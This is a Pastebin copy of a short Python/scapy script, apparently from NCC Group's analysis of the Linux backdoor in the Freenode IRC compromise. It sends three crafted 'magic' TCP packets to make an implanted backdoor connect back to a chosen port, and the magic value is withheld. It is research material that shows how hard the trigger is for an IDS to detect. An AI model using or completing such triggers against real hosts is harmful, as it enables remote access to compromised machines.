Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /usr/bin/env python
- """
- see https://www.nccgroup.com/en/blog/2014/10/analysis-of-the-linux-backdoor-used-in-freenode-irc-network-compromise/
- omitted magic value
- """
- import random
- from scapy.all import IP,TCP,send
- import argparse
- ########
- # Author: NCC Group, Cyber Defence Operations (CDO)
- # Date: September 2014
- #
- # Sends three TCP packets with the correct header values to trigger
- # a connect back on the specified port.
- #
- # This script implements simple randomness for the "magic" header
- # values to demonstrate how difficult it would be to signature in IDS.
- ########
- parser = argparse.ArgumentParser(description='Trigger the backdoor')
- parser.add_argument('TARGET_IP', metavar='TARGET_IP', type=str,
- help='IP to send magic packets to')
- args = parser.parse_args()
- # Target port can be any valid port. iptables filtering does not apply
- # if it's in the normal INPUT chain. This could be randomised per-packet.
- TARGET_PORT = 80
- CALLBACK_PORT = 1234
- for n in range(1, 4):
- # To trigger backdoor the source port + sequence must add up to <Magic Value>
- # Backdoor will connect to us on window - 8192
- source_port = random.randint(1024, 2048)
- sequence = <Magic Value> - source_port # Value not disclosed at this time
- packet = IP(dst=args.TARGET_IP)/TCP(dport=TARGET_PORT,sport=source_port,seq=sequence,window=8192 + CALLBACK_PORT)
- print "[+] Sending magic packet {} of 3 to {}:{} (sport: {}, seq: {})".format(n, args.TARGET_IP, TARGET_PORT, source_port, sequence)
- send(packet)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
